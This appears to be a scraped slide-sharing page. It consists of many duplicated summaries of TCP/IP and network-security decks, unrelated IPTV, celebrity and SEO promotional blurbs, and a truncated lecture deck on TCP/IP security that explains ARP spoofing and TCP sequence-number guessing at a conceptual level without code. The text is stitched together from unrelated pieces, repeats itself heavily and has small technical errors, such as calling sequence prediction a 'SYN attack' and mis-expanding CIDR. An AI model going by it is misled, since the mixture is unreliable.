This document summarizes vulnerabilities in network protocols like TCP/IP, ARP, IP, TCP, FTP, Telnet, and SMTP. It outlines issues like spoofing, flooding attacks, lack of authentication and encryption. It discusses how protocols work at different layers and security problems associated with each, such as spoofing of addresses, hijacking connections, sniffing cleartext data, and denial of service attacks. Prevention methods are also briefly covered.
This document summarizes vulnerabilities in several common network protocols including ARP, IP, TCP, FTP, SMTP, and DNS. It discusses issues like ARP spoofing, TCP SYN flooding attacks, lack of encryption in FTP and SMTP allowing eavesdropping, and DNS spoofing techniques. The document provides high-level overviews of how these protocols work and specific security risks, such as IP spoofing, traffic analysis from unencrypted headers, and filling connection queues in DoS attacks.
The document discusses various hacking techniques for Cisco networks, including reconnaissance attacks like port scanning and sniffing, active attacks like password cracking and trust exploitation, and external attacks like IP spoofing and denial of service. It then covers defenses like authentication, encryption, access control lists, rate limiting, DHCP snooping, and storm control to mitigate risks from these hacking methods.
Wireshark is a network packet analyzer tool that captures and analyzes network traffic. It allows inspection of protocol messages at the packet level. The Address Resolution Protocol (ARP) maps IP addresses to MAC addresses within a local area network. However, ARP is vulnerable to spoofing attacks where a malicious user sends fake ARP responses to poison a target's ARP cache and intercept their network traffic. TCP session hijacking is also possible by sniffing the TCP sequence and acknowledgement numbers during the initial handshake.
The document provides an agenda and lesson plan for a networking class. It includes:
- An agenda with various activities lasting 5-20 minutes each, including warm ups, videos, teacher demonstrations, and reflections.
- Classroom norms on taking notes and being prepared for quizzes.
- An essential question on the TCP/IP protocol and links to online and offline content on networking topics like TCP/IP, ports, DHCP, and IP addressing.
- Information on IP addressing including address classes, subnets, subnet masks, and examples of IP address allocation.
- Suggestions for further information on TCP/IP topics.
This document discusses network security concepts like vulnerabilities in TCP/IP protocols, denial of service attacks, firewalls, and intrusion detection systems. It outlines common attacks like spoofing, flooding, and session hijacking. It also describes the functions of packet filtering firewalls and proxy firewalls, as well as signature-based and anomaly-based intrusion detection systems that can monitor networks or individual hosts.
This document provides an overview of network security concepts including vulnerabilities, denial of service attacks, firewalls, and intrusion detection systems. It discusses how TCP/IP was not initially designed with security in mind and is vulnerable to spoofing and man-in-the-middle attacks. Denial of service attacks like SYN flooding aim to overwhelm servers or networks. Firewalls can limit access and traffic between internal and external networks but have limitations. Intrusion detection systems monitor traffic to identify attacks that bypass firewalls.
This document provides an overview of network security concepts including vulnerabilities, denial of service attacks, firewalls, and intrusion detection systems. It discusses how TCP/IP was not initially designed with security in mind and is vulnerable to spoofing and man-in-the-middle attacks. Denial of service attacks like SYN flooding aim to overwhelm servers through excessive connection requests. Firewalls use packet filtering and proxies to restrict network access and traffic based on security rules. Intrusion detection systems monitor network traffic to identify attacks and anomalies beyond what is allowed by firewall rules.
This document discusses network security concepts including vulnerabilities in TCP/IP protocols, denial of service attacks, firewalls, and intrusion detection systems. It outlines common attacks like spoofing, flooding, and session hijacking. It then describes how firewalls use packet filtering and proxies to limit access and detect intrusions. Finally, it covers intrusion detection systems using signature-based and anomaly-based approaches to monitor network traffic and host activity for attacks.
This document summarizes vulnerabilities in several common network protocols including ARP, IP, TCP, FTP, SMTP, and DNS. It discusses issues like ARP spoofing, TCP SYN flooding attacks, lack of encryption in FTP and SMTP allowing eavesdropping, and DNS spoofing techniques. The document provides high-level overviews of how these protocols work and specific security risks, such as IP spoofing, traffic analysis from unencrypted headers, and filling connection queues in DoS attacks.
The document discusses various hacking techniques for Cisco networks, including reconnaissance attacks like port scanning and sniffing, active attacks like password cracking and trust exploitation, and external attacks like IP spoofing and denial of service. It then covers defenses like authentication, encryption, access control lists, rate limiting, DHCP snooping, and storm control to mitigate risks from these hacking methods.
Wireshark is a network packet analyzer tool that captures and analyzes network traffic. It allows inspection of protocol messages at the packet level. The Address Resolution Protocol (ARP) maps IP addresses to MAC addresses within a local area network. However, ARP is vulnerable to spoofing attacks where a malicious user sends fake ARP responses to poison a target's ARP cache and intercept their network traffic. TCP session hijacking is also possible by sniffing the TCP sequence and acknowledgement numbers during the initial handshake.
The document provides an agenda and lesson plan for a networking class. It includes:
- An agenda with various activities lasting 5-20 minutes each, including warm ups, videos, teacher demonstrations, and reflections.
- Classroom norms on taking notes and being prepared for quizzes.
- An essential question on the TCP/IP protocol and links to online and offline content on networking topics like TCP/IP, ports, DHCP, and IP addressing.
- Information on IP addressing including address classes, subnets, subnet masks, and examples of IP address allocation.
- Suggestions for further information on TCP/IP topics.
This document discusses network security concepts like vulnerabilities in TCP/IP protocols, denial of service attacks, firewalls, and intrusion detection systems. It outlines common attacks like spoofing, flooding, and session hijacking. It also describes the functions of packet filtering firewalls and proxy firewalls, as well as signature-based and anomaly-based intrusion detection systems that can monitor networks or individual hosts.
This document provides an overview of network security concepts including vulnerabilities, denial of service attacks, firewalls, and intrusion detection systems. It discusses how TCP/IP was not initially designed with security in mind and is vulnerable to spoofing and man-in-the-middle attacks. Denial of service attacks like SYN flooding aim to overwhelm servers or networks. Firewalls can limit access and traffic between internal and external networks but have limitations. Intrusion detection systems monitor traffic to identify attacks that bypass firewalls.
This document provides an overview of network security concepts including vulnerabilities, denial of service attacks, firewalls, and intrusion detection systems. It discusses how TCP/IP was not initially designed with security in mind and is vulnerable to spoofing and man-in-the-middle attacks. Denial of service attacks like SYN flooding aim to overwhelm servers through excessive connection requests. Firewalls use packet filtering and proxies to restrict network access and traffic based on security rules. Intrusion detection systems monitor network traffic to identify attacks and anomalies beyond what is allowed by firewall rules.
This document discusses network security concepts including vulnerabilities in TCP/IP protocols, denial of service attacks, firewalls, and intrusion detection systems. It outlines common attacks like spoofing, flooding, and session hijacking. It then describes how firewalls use packet filtering and proxies to limit access and detect intrusions. Finally, it covers intrusion detection systems using signature-based and anomaly-based approaches to monitor network traffic and host activity for attacks.
Network security vulnerabilities exist at various layers of the TCP/IP protocol suite. Firewalls and intrusion detection systems help mitigate these issues. Firewalls use packet filtering or proxies to restrict traffic according to security policies. Intrusion detection systems monitor network traffic or host activity for signs of attacks using signature-based or anomaly-based detection methods.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and moving data in packets across networks, while higher-level protocols like TCP and UDP provide reliability and port addressing to associate packets with applications. Routers route traffic between networks using IP addressing, while protocols like ARP and DHCP configure IP addresses on devices. TCP provides reliable, connection-oriented communication, while UDP is simpler but unreliable. This layered model has allowed the Internet to scale globally across diverse networks.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and moving data in packets across networks, while higher level protocols like TCP and UDP provide reliability and port addressing to deliver data to applications. Routers route traffic between networks using IP addressing, while protocols like ARP and DHCP help devices configure their IP settings. TCP provides reliable, connection-oriented communication, while UDP is simpler but unreliable. This document provides an overview of the TCP/IP model and common protocols.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Networks are connected via routers that route packets between IP networks using IP addressing.
Title Slide:
Title: Introduction to TCP/IP Networking
Subtitle: Understanding the Backbone of the Internet
Slide 1: Introduction to TCP/IP:
Brief overview of TCP/IP.
Explanation of its importance as the fundamental protocol suite of the Internet.
Slide 2: TCP/IP Layers:
Explanation of the four layers of the TCP/IP model: Link, Internet, Transport, and Application.
Briefly describe the purpose of each layer.
Slide 3: IP Addressing:
Explanation of IP addresses and their role in uniquely identifying devices on a network.
Differentiation between IPv4 and IPv6.
Slide 4: Subnetting:
Introduction to subnetting in TCP/IP networks.
Purpose and benefits of subnetting.
Slide 5: TCP (Transmission Control Protocol):
Overview of TCP and its role as a reliable, connection-oriented protocol.
Explanation of features like error checking, flow control, and sequencing.
Slide 6: UDP (User Datagram Protocol):
Overview of UDP and its role as a connectionless, lightweight protocol.
Comparison with TCP.
Slide 7: Ports and Sockets:
Explanation of ports and sockets in TCP/IP.
Role in enabling communication between applications.
Slide 8: DNS (Domain Name System):
Overview of DNS and its role in translating human-readable domain names into IP addresses.
Importance of DNS in Internet communication.
Slide 9: DHCP (Dynamic Host Configuration Protocol):
Explanation of DHCP and its role in dynamically assigning IP addresses to devices on a network.
Benefits of DHCP.
Slide 10: Routing and Routers:
Overview of routing in TCP/IP networks.
Role of routers in directing data between networks.
Slide 11: Security in TCP/IP:
Introduction to security considerations in TCP/IP networks.
Briefly cover topics like firewalls, VPNs, and encryption.
Slide 12: Future Trends:
Brief discussion on emerging technologies and trends in TCP/IP.
Topics like IoT (Internet of Things) and 5G.
Slide 13: Conclusion:
Summary of key points.
Emphasis on the ubiquity and importance of TCP/IP in modern networking.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Networks are connected via routers that route packets between IP addresses. This allows different networks using different link layer technologies like Ethernet to interconnect.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Routers use IP addresses and routing tables to direct traffic between networks, while protocols like ARP map IP addresses to MAC addresses for delivery within a local network.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Routers use IP addresses and routing tables to direct traffic between networks, while protocols like ARP map IP addresses to MAC addresses for delivery within a local network.
The document discusses transport layer protocols and their role in providing communication between application processes on different hosts. It describes the two main Internet transport protocols, UDP which provides a simple unreliable datagram service, and TCP which provides reliable in-order delivery of data streams through mechanisms like acknowledgments, retransmissions, and flow control. The document also examines how TCP establishes connections, handles packet loss through retransmissions, and provides reliable data transfer over unreliable networks.
This document provides an overview of transport layer protocols and TCP/IP. It discusses:
1. The role of the transport layer in providing communication between processes and serving the application layer. The main transport protocols are TCP and UDP.
2. TCP provides reliable, in-order delivery through mechanisms like checksums, sequence numbers, acknowledgments, retransmissions, and flow control. UDP provides a simpler unreliable datagram service.
3. TCP establishes connections using a three-way handshake and tears them down through FIN packets. It provides a reliable byte stream using segments with sequence numbers within a sliding window.
The document discusses various phases of intrusion and techniques used by attackers:
1. Reconnaissance involves gathering information about the target through techniques like searching public databases, domain name records, and social engineering to map the network and discover vulnerabilities.
2. Scanning detects live machines, network topology, firewall configurations, applications, and vulnerabilities using tools like ping sweeps, traceroute, port scanning, and vulnerability scanners.
3. Gaining access exploits known vulnerabilities through buffer overflow attacks or by downloading exploits from hacker sites to compromise systems.
The document provides an overview of network infrastructure components including networking hardware, software, and services. It then discusses several key network protocols including TCP, IP, routing protocols, and DNS. It provides details on the OSI model and describes each layer including typical functions, protocols, and vulnerabilities. For TCP and IP, it outlines the basic operation including packet formatting, connection establishment, flow control, congestion control, and error handling.
1. A host creates a packet and places the destination address in the header.
2. The host sends the packet to the nearest router.
3. Each router uses the destination address to select the next router and forwards the packet.
4. The packet is forwarded from router to router until it reaches the destination router, which delivers it to the final destination host.
The document discusses the TCP/IP protocol suite and transport layer services. Some key points:
- TCP/IP was originally developed by DARPA and later included in UNIX. It maps to the OSI layers and supports various physical/data link protocols.
- The transport layer provides logical communication between application processes on different hosts. TCP and UDP are the main transport protocols.
- TCP provides reliable, in-order byte streams using connection establishment and acknowledgments. UDP is a simpler connectionless protocol.
- Port numbers and IP addresses are used to multiplex/demultiplex segments between sockets at hosts for processes to communicate.
- TCP uses a three-way handshake to establish reliable connections between
The document discusses the four levels of addressing used in TCP/IP:
1. Physical address - identifies network interfaces or devices
2. Logical address - IP addresses that identify devices on the network
3. Port address - identifies applications/processes on devices using port numbers
4. Application-specific address - some applications use their own addressing schemes above the port level.
This document provides an introduction to socket programming in C on Linux. Some key points:
- Sockets allow communication between processes over a network and act as an interface between applications and the network. They are represented by file descriptors.
- There are two main types of sockets - stream sockets (TCP) which provide reliable, ordered data transmission and datagram sockets (UDP) which are unreliable but do not require a connection.
- The socket API includes functions like socket(), bind(), listen(), accept(), connect(), recv(), send(), etc. to create and manage sockets and network communication.
- Data structures like sockaddr_in are used to store socket addresses containing IP and port. Byte ordering functions like
Zhiyun Qian-what leaves attacker hijacking USA Today siteGeekPwn Keen
In GeekPwn2016 Mid-year Contest, doctoral student Cao Yue of Dr.Zhiyun Qian showed ‘TCP hijacking’ attack. This attack can pop up a fishing web page and steal user’s password. This vulnerability in TCP/IP stack exists in almost all Android and Linux editions. Explained by Cao Yue, this vulnerability is found by his director, Mr. Qian found this vulnerability by reviewing Linux kernel source code.
At Digidev, we are working to be the leader in interactive streaming platforms of choice by smart device users worldwide.
Our goal is to become the ultimate distribution service of entertainment content. The Digidev application will offer the next generation television highway for users to discover and engage in a variety of content. While also providing a fresh and
innovative approach towards advertainment with vast revenue opportunities. Designed and developed by Joe Q. Bretz
Top IPTV UK Providers of A Comprehensive Review.pdfXtreame HDTV
The television landscape in the UK has evolved significantly with the rise of Internet Protocol Television (IPTV). IPTV offers a modern alternative to traditional cable and satellite TV, allowing viewers to stream live TV, on-demand videos, and other multimedia content directly to their devices over the internet. This review provides an in-depth look at the top IPTV UK providers, their features, pricing, and what sets them apart.
Network security vulnerabilities exist at various layers of the TCP/IP protocol suite. Firewalls and intrusion detection systems help mitigate these issues. Firewalls use packet filtering or proxies to restrict traffic according to security policies. Intrusion detection systems monitor network traffic or host activity for signs of attacks using signature-based or anomaly-based detection methods.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and moving data in packets across networks, while higher-level protocols like TCP and UDP provide reliability and port addressing to associate packets with applications. Routers route traffic between networks using IP addressing, while protocols like ARP and DHCP configure IP addresses on devices. TCP provides reliable, connection-oriented communication, while UDP is simpler but unreliable. This layered model has allowed the Internet to scale globally across diverse networks.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and moving data in packets across networks, while higher level protocols like TCP and UDP provide reliability and port addressing to deliver data to applications. Routers route traffic between networks using IP addressing, while protocols like ARP and DHCP help devices configure their IP settings. TCP provides reliable, connection-oriented communication, while UDP is simpler but unreliable. This document provides an overview of the TCP/IP model and common protocols.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Networks are connected via routers that route packets between IP networks using IP addressing.
Title Slide:
Title: Introduction to TCP/IP Networking
Subtitle: Understanding the Backbone of the Internet
Slide 1: Introduction to TCP/IP:
Brief overview of TCP/IP.
Explanation of its importance as the fundamental protocol suite of the Internet.
Slide 2: TCP/IP Layers:
Explanation of the four layers of the TCP/IP model: Link, Internet, Transport, and Application.
Briefly describe the purpose of each layer.
Slide 3: IP Addressing:
Explanation of IP addresses and their role in uniquely identifying devices on a network.
Differentiation between IPv4 and IPv6.
Slide 4: Subnetting:
Introduction to subnetting in TCP/IP networks.
Purpose and benefits of subnetting.
Slide 5: TCP (Transmission Control Protocol):
Overview of TCP and its role as a reliable, connection-oriented protocol.
Explanation of features like error checking, flow control, and sequencing.
Slide 6: UDP (User Datagram Protocol):
Overview of UDP and its role as a connectionless, lightweight protocol.
Comparison with TCP.
Slide 7: Ports and Sockets:
Explanation of ports and sockets in TCP/IP.
Role in enabling communication between applications.
Slide 8: DNS (Domain Name System):
Overview of DNS and its role in translating human-readable domain names into IP addresses.
Importance of DNS in Internet communication.
Slide 9: DHCP (Dynamic Host Configuration Protocol):
Explanation of DHCP and its role in dynamically assigning IP addresses to devices on a network.
Benefits of DHCP.
Slide 10: Routing and Routers:
Overview of routing in TCP/IP networks.
Role of routers in directing data between networks.
Slide 11: Security in TCP/IP:
Introduction to security considerations in TCP/IP networks.
Briefly cover topics like firewalls, VPNs, and encryption.
Slide 12: Future Trends:
Brief discussion on emerging technologies and trends in TCP/IP.
Topics like IoT (Internet of Things) and 5G.
Slide 13: Conclusion:
Summary of key points.
Emphasis on the ubiquity and importance of TCP/IP in modern networking.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Networks are connected via routers that route packets between IP addresses. This allows different networks using different link layer technologies like Ethernet to interconnect.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Routers use IP addresses and routing tables to direct traffic between networks, while protocols like ARP map IP addresses to MAC addresses for delivery within a local network.
TCP/IP is a set of protocols that allows networks to interconnect and exchange data. It uses IP for addressing devices and routing packets between networks, while higher level protocols like TCP and UDP provide reliability and port addressing for specific applications. TCP provides reliable, ordered connections, while UDP is simpler and used for applications like streaming media that can tolerate packet loss. Routers use IP addresses and routing tables to direct traffic between networks, while protocols like ARP map IP addresses to MAC addresses for delivery within a local network.
The document discusses transport layer protocols and their role in providing communication between application processes on different hosts. It describes the two main Internet transport protocols, UDP which provides a simple unreliable datagram service, and TCP which provides reliable in-order delivery of data streams through mechanisms like acknowledgments, retransmissions, and flow control. The document also examines how TCP establishes connections, handles packet loss through retransmissions, and provides reliable data transfer over unreliable networks.
This document provides an overview of transport layer protocols and TCP/IP. It discusses:
1. The role of the transport layer in providing communication between processes and serving the application layer. The main transport protocols are TCP and UDP.
2. TCP provides reliable, in-order delivery through mechanisms like checksums, sequence numbers, acknowledgments, retransmissions, and flow control. UDP provides a simpler unreliable datagram service.
3. TCP establishes connections using a three-way handshake and tears them down through FIN packets. It provides a reliable byte stream using segments with sequence numbers within a sliding window.
The document discusses various phases of intrusion and techniques used by attackers:
1. Reconnaissance involves gathering information about the target through techniques like searching public databases, domain name records, and social engineering to map the network and discover vulnerabilities.
2. Scanning detects live machines, network topology, firewall configurations, applications, and vulnerabilities using tools like ping sweeps, traceroute, port scanning, and vulnerability scanners.
3. Gaining access exploits known vulnerabilities through buffer overflow attacks or by downloading exploits from hacker sites to compromise systems.
The document provides an overview of network infrastructure components including networking hardware, software, and services. It then discusses several key network protocols including TCP, IP, routing protocols, and DNS. It provides details on the OSI model and describes each layer including typical functions, protocols, and vulnerabilities. For TCP and IP, it outlines the basic operation including packet formatting, connection establishment, flow control, congestion control, and error handling.
1. A host creates a packet and places the destination address in the header.
2. The host sends the packet to the nearest router.
3. Each router uses the destination address to select the next router and forwards the packet.
4. The packet is forwarded from router to router until it reaches the destination router, which delivers it to the final destination host.
The document discusses the TCP/IP protocol suite and transport layer services. Some key points:
- TCP/IP was originally developed by DARPA and later included in UNIX. It maps to the OSI layers and supports various physical/data link protocols.
- The transport layer provides logical communication between application processes on different hosts. TCP and UDP are the main transport protocols.
- TCP provides reliable, in-order byte streams using connection establishment and acknowledgments. UDP is a simpler connectionless protocol.
- Port numbers and IP addresses are used to multiplex/demultiplex segments between sockets at hosts for processes to communicate.
- TCP uses a three-way handshake to establish reliable connections between
The document discusses the four levels of addressing used in TCP/IP:
1. Physical address - identifies network interfaces or devices
2. Logical address - IP addresses that identify devices on the network
3. Port address - identifies applications/processes on devices using port numbers
4. Application-specific address - some applications use their own addressing schemes above the port level.
This document provides an introduction to socket programming in C on Linux. Some key points:
- Sockets allow communication between processes over a network and act as an interface between applications and the network. They are represented by file descriptors.
- There are two main types of sockets - stream sockets (TCP) which provide reliable, ordered data transmission and datagram sockets (UDP) which are unreliable but do not require a connection.
- The socket API includes functions like socket(), bind(), listen(), accept(), connect(), recv(), send(), etc. to create and manage sockets and network communication.
- Data structures like sockaddr_in are used to store socket addresses containing IP and port. Byte ordering functions like
Zhiyun Qian-what leaves attacker hijacking USA Today siteGeekPwn Keen
In GeekPwn2016 Mid-year Contest, doctoral student Cao Yue of Dr.Zhiyun Qian showed ‘TCP hijacking’ attack. This attack can pop up a fishing web page and steal user’s password. This vulnerability in TCP/IP stack exists in almost all Android and Linux editions. Explained by Cao Yue, this vulnerability is found by his director, Mr. Qian found this vulnerability by reviewing Linux kernel source code.
At Digidev, we are working to be the leader in interactive streaming platforms of choice by smart device users worldwide.
Our goal is to become the ultimate distribution service of entertainment content. The Digidev application will offer the next generation television highway for users to discover and engage in a variety of content. While also providing a fresh and
innovative approach towards advertainment with vast revenue opportunities. Designed and developed by Joe Q. Bretz
Top IPTV UK Providers of A Comprehensive Review.pdfXtreame HDTV
The television landscape in the UK has evolved significantly with the rise of Internet Protocol Television (IPTV). IPTV offers a modern alternative to traditional cable and satellite TV, allowing viewers to stream live TV, on-demand videos, and other multimedia content directly to their devices over the internet. This review provides an in-depth look at the top IPTV UK providers, their features, pricing, and what sets them apart.
Matt Rife Cancels Shows Due to Health Concerns, Reschedules Tour Dates.pdfAzura Everhart
Matt Rife's comedy tour took an unexpected turn. He had to cancel his Bloomington show due to a last-minute medical emergency. Fans in Chicago will also have to wait a bit longer for their laughs, as his shows there are postponed. Rife apologized and assured fans he'd be back on stage soon.
https://www.theurbancrews.com/celeb/matt-rife-cancels-bloomington-show/
Unveiling Paul Haggis Shaping Cinema Through Diversity. .pdfkenid14983
Paul Haggis is undoubtedly a visionary filmmaker whose work has not only shaped cinema but has also pushed boundaries when it comes to diversity and representation within the industry. From his thought-provoking scripts to his engaging directorial style, Haggis has become a prominent figure in the world of film.
The Evolution of the Leonardo DiCaprio Haircut: A Journey Through Style and C...greendigital
Leonardo DiCaprio, a name synonymous with Hollywood stardom and acting excellence. has captivated audiences for decades with his talent and charisma. But, the Leonardo DiCaprio haircut is one aspect of his public persona that has garnered attention. From his early days as a teenage heartthrob to his current status as a seasoned actor and environmental activist. DiCaprio's hairstyles have evolved. reflecting both his personal growth and the changing trends in fashion. This article delves into the many phases of the Leonardo DiCaprio haircut. exploring its significance and impact on pop culture.
Everything You Need to Know About IPTV Ireland.pdfXtreame HDTV
The way we consume television has evolved dramatically over the past decade. Internet Protocol Television (IPTV) has emerged as a popular alternative to traditional cable and satellite TV, offering a wide range of channels and on-demand content via the internet. In Ireland, IPTV is rapidly gaining traction, with Xtreame HDTV being one of the prominent providers in the market. This comprehensive guide will delve into everything you need to know about IPTV Ireland, focusing on Xtreame HDTV, its features, benefits, and how it is revolutionizing TV viewing for Irish audiences.
_7 OTT App Builders to Support the Development of Your Video Applications_.pdfMega P
Due to their ability to produce engaging content more quickly, over-the-top (OTT) app builders have made the process of creating video applications more accessible. The invitation to explore these platforms emphasizes how over-the-top (OTT) applications hold the potential to transform digital entertainment.
Christian Louboutin: Innovating with Red Solesget joys
Christian Louboutin is celebrated for his innovative approach to footwear design, marked by his trademark red soles. This in-depth look at his life and career explores the origins of his creativity, the milestones in his journey, and the impact of his work on the fashion industry. Learn how Louboutin's bold vision and dedication to excellence have made his brand synonymous with luxury and style.
Barbie Movie Review - The Astras.pdffffftheastras43
Barbie Movie Review has gotten brilliant surveys for its fun and creative story. Coordinated by Greta Gerwig, it stars Margot Robbie as Barbie and Ryan Gosling as Insight. Critics adore its perky humor, dynamic visuals, and intelligent take on the notorious doll's world. It's lauded for being engaging for both kids and grown-ups. The Astras profoundly prescribes observing the Barbie Review for a delightful and colorful cinematic involvement.https://theastras.com/hca-member-gradebooks/hca-gradebook-barbie/
Modern Radio Frequency Access Control Systems: The Key to Efficiency and SafetyAITIX LLC
Today's fast-paced environment worries companies of all sizes about efficiency and security. Businesses are constantly looking for new and better solutions to solve their problems, whether it's data security or facility access. RFID for access control technologies have revolutionized this.
Orpah Winfrey Dwayne Johnson: Titans of Influence and Inspirationgreendigital
Introduction
In the realm of entertainment, few names resonate as Orpah Winfrey Dwayne Johnson. Both figures have carved unique paths in the industry. achieving unparalleled success and becoming iconic symbols of perseverance, resilience, and inspiration. This article delves into the lives, careers. and enduring legacies of Orpah Winfrey Dwayne Johnson. exploring how their journeys intersect and what we can learn from their remarkable stories.
Follow us on: Pinterest
Early Life and Backgrounds
Orpah Winfrey: From Humble Beginnings to Media Mogul
Orpah Winfrey, often known as Oprah due to a misspelling on her birth certificate. was born on January 29, 1954, in Kosciusko, Mississippi. Raised in poverty by her grandmother, Winfrey's early life was marked by hardship and adversity. Despite these challenges. she demonstrated a keen intellect and an early talent for public speaking.
Winfrey's journey to success began with a scholarship to Tennessee State University. where she studied communication. Her first job in media was as a co-anchor for the local evening news in Nashville. This role paved the way for her eventual transition to talk show hosting. where she found her true calling.
Dwayne Johnson: From Wrestling Royalty to Hollywood Superstar
Dwayne Johnson, also known by his ring name "The Rock," was born on May 2, 1972, in Hayward, California. He comes from a family of professional wrestlers, with both his father, Rocky Johnson. and his grandfather, Peter Maivia, being notable figures in the wrestling world. Johnson's early life was spent moving between New Zealand and the United States. experiencing a variety of cultural influences.
Before entering the world of professional wrestling. Johnson had aspirations of becoming a professional football player. He played college football at the University of Miami. where he was part of a national championship team. But, injuries curtailed his football career, leading him to follow in his family's footsteps and enter the wrestling ring.
Career Milestones
Orpah Winfrey: The Queen of All Media
Winfrey's career breakthrough came in 1986 when she launched "The Oprah Winfrey Show." The show became a cultural phenomenon. drawing millions of viewers daily and earning many awards. Winfrey's empathetic and candid interviewing style resonated with audiences. helping her tackle diverse and often challenging topics.
Beyond her talk show, Winfrey expanded her empire to include the creation of Harpo Productions. a multimedia production company. She also launched "O, The Oprah Magazine" and OWN: Oprah Winfrey Network, further solidifying her status as a media mogul.
Dwayne Johnson: From The Ring to The Big Screen
Dwayne Johnson's wrestling career took off in the late 1990s. when he became one of the most charismatic and popular figures in WWE. His larger-than-life persona and catchphrases endeared him to fans. making him a household name. But, Johnson had ambitions beyond the wrestling ring.
In the early 20
2. 2
Outline
• TCP/IP Layering
• Names and Addresses
• Security Considerations for
– Address Resolution Protocol
– Internet Protocol
– Transmission Control Protocol
– FTP,Telnet, SMTP
– Web Security
• Browser Side Risks
• Server Side Risks
8. 8
IP Addresses
• Just to refresh!
• Every interface has a unique IP address
• 32 bits long, usually given in dotted decimal
notation
• 5 classes:
– class A: “0” + 7 bits net ID + 24 bits host ID
– class B: “10” + 14 bits net ID + 16 bits host ID
– class C: “110” + 21 bits net ID + 8 bits host ID
– class D: “1110” + 28 bits multicast group ID
– class E: “11110”, reserved for future use
9. 9
Subnet Addressing
• CIDR - classless Internet domain
routing
• Host ID portion is divided into a
subnet ID and a host ID
• e.g., class B address: “10” + 14 bit net
ID + 8 bit subnet ID + 8 bit host ID
• Hierarchical addressing
10. 10
Hardware (MAC) Addresses
• Every interface has a unique and fixed
hardware address too
• Used by the data link layer
• In case of Ethernet, it is 48 bits long
• Mapping between IP addresses and MAC
addresses are done by ARP
11. 11
Host Names
• Human readable, hierarchical names, such
as www.case.edu.pk
• Every host may have several names
• Mapping between names and IP addresses
is done by the Domain Name System (DNS)
15. 15
Switch
ARP Spoofing
• Used for sniffing on switched LAN
Outside
World
1. Configure IP
forwarding
2. Send fake ARP
response to map
default router’s IP
to attacker’s MAC
3. Victim sends
traffic based on
poisoned ARP
cache
4. Sniff the
traffic from the
link
5. Packets are forwarded
from attacker’s machine
to actual default router
Default Router
Attacker
Victim
16. 16
ARP Spoofing Prevention ?
• Cryptographic protection on the data is the
only way
– Not allow any untrusted node to read the
contents of your traffic
18. 18
IP – Internet Protocol
• Provides an unreliable, connectionless datagram
delivery service to the upper layers
• Its main function is routing
• It is implemented in both end systems and
intermediate systems (routers)
• Routers maintain routing tables that define the
next hop router towards a given destination (host
or network)
• IP routing uses the routing table and the
information in the IP header (e.g., the destination
IP address) to route a packet
19. 19
IP Security Problems
• User data in IP packets is not protected in any
way
– Anyone who has access to a router can read and
modify the user data in the packets
• IP packets are not authenticated
– It is fairly easy to generate an IP packet with
an arbitrary source IP address
• Traffic analysis
– Even if user data was encrypted, one could
easily determine who is communicating with
whom by just observing the addressing
information in the IP headers
20. 20
IP Security Problems
• Information exchanged between routers to
maintain their routing tables is not
authenticated
– Correct routing table updates can be
modified or fake ones can be
disseminated
– This may screw up routing completely
leading to loops or partitions
– It may also facilitate eavesdropping,
modification, and monitoring of traffic
– It may cause congestion of links or
routers (i.e., denial of service)
22. 22
TCP – Transmission Control
Protocol
• Provides a connection oriented, reliable,
byte stream service to the upper layers
• Connection oriented:
– Connection establishment phase prior to
data transfer
– State information (sequence numbers,
window size, etc.) is maintained at both
ends
23. 23
TCP- Reliability
• Positive acknowledgement scheme
(unacknowledged bytes are retransmitted
after a timeout)
• Checksum on both header and data
• Reordering of segments that are out of
order
• Detection of duplicate segments
• Flow control (sliding window mechanism)
25. 25
TCP Sequence Numbers
• TCP uses ISN (Initial Sequence Number)
to order the incoming packets for a
connection
• Sequence numbers are 32 bits long
• The sequence number in a data segment
identifies the first byte in the segment
• Sequence numbers are initialized with a
“random” value during connection setup
• The RFC suggests that the ISN is
incremented by one at least every 4 ms
26. 26
TCP SYN Attack
• An attacker can impersonate a trusted host
(e.g., in case of r commands, authentication is
based on source IP address solely)
– This can be done guessing the sequence number in
the ongoing communication
– The initial sequence numbers are intended to be
more or less random
27. 27
TCP SYN Attack
• In Berkeley implementations, the ISN is
incremented by a constant amount
– 128,000 once per second, and
– further 64,000 each time a connection is
initiated
• RFC 793 specifies that the 32-bit counter
be incremented by 1 about every 4 ms
– the ISN cycles every 4.55 hours
• Whatever! It is not hopeless to guess the
next ISN to be used by a system
28. 28
Launching a SYN Attack
• The attacker first establishes a valid
connection with the target to know its
ISN.
• Next it impersonates itself as trusted host
T and sends the connection request with
ISNx
